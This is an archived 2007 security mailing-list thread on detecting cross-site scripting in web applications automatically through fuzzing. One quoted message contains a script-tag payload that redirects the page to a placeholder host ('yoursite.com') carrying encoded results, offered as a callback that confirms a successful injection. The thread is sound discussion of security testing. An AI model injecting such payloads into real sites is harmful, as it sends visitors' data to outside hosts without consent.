
Re: [WEB SECURITY] How to detect XSS in an automated fashion




It doesn't look like anyone has tried to make the distinction here between
reflected and stored XSS. Fuzzing makes a lot of sense for catching
reflected vulns, but they're also a lot lower in value than stored.
Automated runtime testing for stored XSS gets a lot more complicated, and I
have yet to see a solid approach to that problem. It's theoretically pretty
simple, but in practice I could see it getting out of hand very quickly.

-j

On 8/30/07, Billy Hoffman <Billy.Hoffman@spidynamics.com> wrote:
>
> Not bad, but this isn't great either. Ignoring how you gain code
> execution (<script> tag, scriptable attribute, javascript href, CSS,
> etc), your "call back to a server" logging method requires the following
> 5 special characters: . = : / ?
>
> While piggybacking on the browser certainly works for a quick tool, you
> really need to embed a full JavaScript interpreter into your scan and be
> able to control DOM events, properties, etc. Then your confirmation step
> can be as simple as setting a variable!
>
> Trust me, I've been down this road before. Go look at Mozilla's Rhino or
> SpiderMonkey if the licensing works for your project.
>
> Billy Hoffman
> --
> Lead Researcher, SPI Labs
> SPI Dynamics, An HP Company
> http://www.spidynamics.com
> Phone:  678-781-4800
> Direct:   678-781-4845
> Attend SPICON 2.0 - SPI Dynamics' User Conference - and earn CPE
> credits.
> Sign up today at http://www.spicon2007.com/.
>
> -----Original Message-----
> From: gaz_sec@hushmail.com [mailto:gaz_sec@hushmail.com]
> Sent: Wednesday, August 29, 2007 9:42 PM
> To: websecurity@webappsec.org; Billy Hoffman
> Cc: travisaltman@gmail.com
> Subject: RE: [WEB SECURITY] How to detect XSS in an automated fashion
>
> I've thought about an XSS fuzzer a bit more now, you'll have to
> excuse me but it's 2.30am here :) Right, the best way to do it in my
> opinion is:
>
> 1. Base site contains an iframe with the target site in.
> 2. The base site sends XSS fuzz to the target site through
> javascript location.
> 3. The fuzzer contains javascript code to log the results back to a
> server side script. E.g.
> <script>self.location='http://yoursite.com?logresults?fuzzResult=FuzzBaseEncoded'</script>
>
>
> On Thu, 30 Aug 2007 01:48:29 +0100 Billy Hoffman
> <Billy.Hoffman@spidynamics.com> wrote:
> >Of course, that only works if your web scanner has a JavaScript
> >interpreter!
> >
> >Billy
> >
> >-----Original Message-----
> >From: gaz_sec@hushmail.com [mailto:gaz_sec@hushmail.com]
> >Sent: Wed 8/29/2007 3:03 PM
> >To: websecurity@webappsec.org
> >Cc: travisaltman@gmail.com
> >Subject: Re: [WEB SECURITY] How to detect XSS in an automated
> >fashion
> >
> >Hi Travis
> >
> >I've written an HTML/JS fuzzer in which I encountered the same
> >problem. I decided to create a simple javascript callback which was
> >executed on successful fuzz. I base encoded the result and sent the
> >information via a normal HTML image (really a PHP script) which
> >logged the results.
> >
> >Cheers
> >
> >Gareth
> >
> >On Wed, 29 Aug 2007 19:22:22 +0100 Travis Altman
> ><travisaltman@gmail.com> wrote:
> >>I am trying to run through a dictionary of XSS attacks (aka
> >>fuzzing) on a web application. What is the best way to determine,
> >>in an automated fashion, if each attack was successful? Would I
> >>simply review the source code of the response to see if my attack
> >>was encoded or filtered?
> >>
> >>http://travisaltman.com
> >
> >
> >----------------------------------------------------------------------------
> >Join us on IRC: irc.freenode.net #webappsec
> >
> >Have a question? Search The Web Security Mailing List Archives:
> >http://www.webappsec.org/lists/websecurity/
> >
> >Subscribe via RSS:
> >http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>
>




Brought to you by http://www.webappsec.org